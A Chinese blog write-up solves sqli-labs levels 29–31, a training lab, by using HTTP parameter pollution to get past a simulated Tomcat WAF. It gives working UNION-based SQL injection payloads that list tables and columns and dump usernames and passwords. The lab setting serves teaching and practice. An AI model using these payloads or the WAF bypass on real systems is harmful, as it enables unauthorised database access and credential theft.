sqli-labs通关全解---有关WAF--less29~31--10

最新推荐文章于 2024-07-22 20:14:04 发布
最新推荐文章于 2024-07-22 20:14:04 发布
阅读量130 收藏 1
点赞数
分类专栏: sql-labs 文章标签: 服务器 apache 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/128677232
版权
文章讲述了服务器采用Tomcat和Apache双层架构时,由于参数解析差异可能导致的安全问题。攻击者可以利用HTTP协议允许同名参数多次出现的特性,构造特定请求来绕过WAF的检测,执行如SQL注入的攻击,进行数据库的爆破,包括数据表、列名以及用户名和密码信息。
摘要由CSDN通过智能技术生成

服务器两层架构

​ 服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。

 在与服务器进行交互的过程中,客户端往往会在GET/POST请求中带上参数。通常在一个请求中,同名参数只会出现一次,但是在HTTP协议中是允许同名参数多次出现的。

假设请求为index.php?id=1&id=2,客户端请求首先通过tomcat解析第一个参数,接下来tomcat去请求apache服务器,而apache解析最后一个参数。实际提供服务的是apache服务器,因此返回客户端的是id=2。

下表为数服务器对参数解析的:

web服务器参数获取函数获取到的参数
PHP/Apache$_GET(“par”)Last
JSP/TmocatRequest.getParameter(“par”)First
Perl(CGI)/ApacheParam(“par”)First
Python/Apachegetvalue(“par”)All(List)
ASP/IISRequest.QueryString(“par”)All(comma-delimited string)

HTTP参数污染

如果一个网站只在tomcat服务器处做数据过滤和处理,我们可以利用解析参数的不同,对WAF检

测进行绕过。

攻击payload:index.php?id=-1' union select 1,database(),3--+

union select…会被tomcat服务器识别为恶意攻击并拦截,而如果payload如下:

攻击payload:index.php?id=1&id=-1' union select 1,database(),3--+

n select 1,database(),3–+```

tomcat服务器检测第一个参数后发现无异常,提交给apache服务器。成功绕过WAF拦截

爆破数据库

?id=1&id=-1' union select 1,2,database() --+

爆破数据表

?id=1&id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

爆破users表的列

?id=1&id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

爆破用户名和密码

?id=1&id=-1' union select 1,group_concat(username,':',password),3 from users --+

less-30 GET-BLIND-IMPIDENCE MISMATCH -Having a WAF in front of web application

该题和上题基本相同,只有闭合方式不同,不同点在于闭合方式不同

只需要通过多次提交参数,就可以实现对WAF的绕过

爆破数据表

?id=1&id=-1" union select 1,2,database() --+

爆破数据表

?id=1&id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

爆破users表的列

?id=1&id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

爆破用户名和密码

?id=1&id=-1" union select 1,group_concat(username,':',password),3 from users --+

less-31 GET -BLIND-IMPIDENCE MISMATCH -Having a WAF in front of web application

该题与前面两题相同,但是闭合方式不同

爆破数据表

?id=1&id=-1") union select 1,2,database() --+

爆破数据表

?id=1&id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

爆破users表的列

?id=1&id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

爆破用户名和密码

?id=1&id=-1") union select 1,group_concat(username,':',password),3 from users --+

 

 

 

 

辰霖心
关注
专栏目录
sqlilabs通关()
Forrest_bear的博客
05-24 2332
就像以下代码一样:隔离空格。
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1631
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf
sqli-labs-waf
Starr
02-20 322
文章目录0.环境配置1. HPP29. GET-WAF-Single quote30. Blind 2931. twist 30 这一部分对应sqli-labs的29-31题,重点是http参数污染/HPP/HTTP Parameter Pollution。 0.环境配置 直接使用jspstudy,省略tomcat等安装步骤。 jspstudy的站点域名,配置到jspstudy/www路径,端口8080(默认80). 几个题的index.jsp,第27行的url修改成本地真实路径,以下是我的虚拟机中配置的路
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 622
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
sqli-labs通关攻略
jhfjdf的博客
10-13 1385
sqli-labsless 1 less 1 字符型注入,单引号 网址后面接 ?id=1 正常显示,然后判断注入点 ?id=1' and 1=1--+ 将1=1换成1=2,发现没有报错,但不显示信息,说明可以使用字符注入 之后判断列数,使用order by,从1开始逐渐递增,报错时停止。 ?id=1' order by 1--+ ...
SQLi-Labs通关攻略
Clannad的博客
10-30 4432
文章目录1、准备工作2、通关关卡 1、准备工作 SQLi-Labs靶场的准备 2、通关关卡
sqli-labs通关记录
qq_39670065的博客
07-11 2793
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1720
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1691
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
基于docker环境下的sqli-labs学习
weixin_40565258的博客
06-28 1112
sqli-labs学习Sqli-labs docker搭建以及1-2关sqli-labs第一关---字符型注入Sqli-labs第二关---数字型注入 Sqli-labs docker搭建以及1-2关 前言:想必大家都对SQL注入漏洞很熟悉了吧,提起SQL注入大家都会想起二十一世纪的大杀器–SQLmap,基本上大家找到注入点的url,就直接SQLmap进行一把梭。工具给sql注入漏洞利用带来了巨大便利,同时也带来了一些问题–手工注入能力退化、绕WAF的诉求也越来越高。前一阵子很荣幸得到安全界大佬指点,说基础
sqli-labs通关大全(更新至Less60)
热门推荐
箭雨镜屋
09-03 1万+
sqli-labs通关(less1~less10)_箭雨镜屋-CSDN博客 sqli-labs通关(less11~less20)_箭雨镜屋-CSDN博客 sqli-labs通关(less21~less30)_箭雨镜屋-CSDN博客
sqli-labs 通关日志 萌新向
春日野穹
11-16 2023
0x0 引言 sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力 萌新建议先看这个帖子再来做题:https://blog.csdn.net/chest_/article/details/102537988 目录快速导航 环境的搭...
sqli-labs通关(一)(二)
qq_65950075的博客
04-24 159
注意,在Mysql5.0以上, Mysql自带了Information_schema这个数据库, 5.0以下是没有的,information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。id=10,我们发现输入的数值不同,返回的信息也不同,所以输入的数值应该是被代入到数据库中进行查询。
sqli-labs通关详解
m0_52051132的博客
10-15 7033
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs通关(1-20)
weixin_57827781的博客
05-18 1558
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql注入
sql-labs通关讲解
最新发布
qq_70836100的博客
07-22 1031
目录。
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值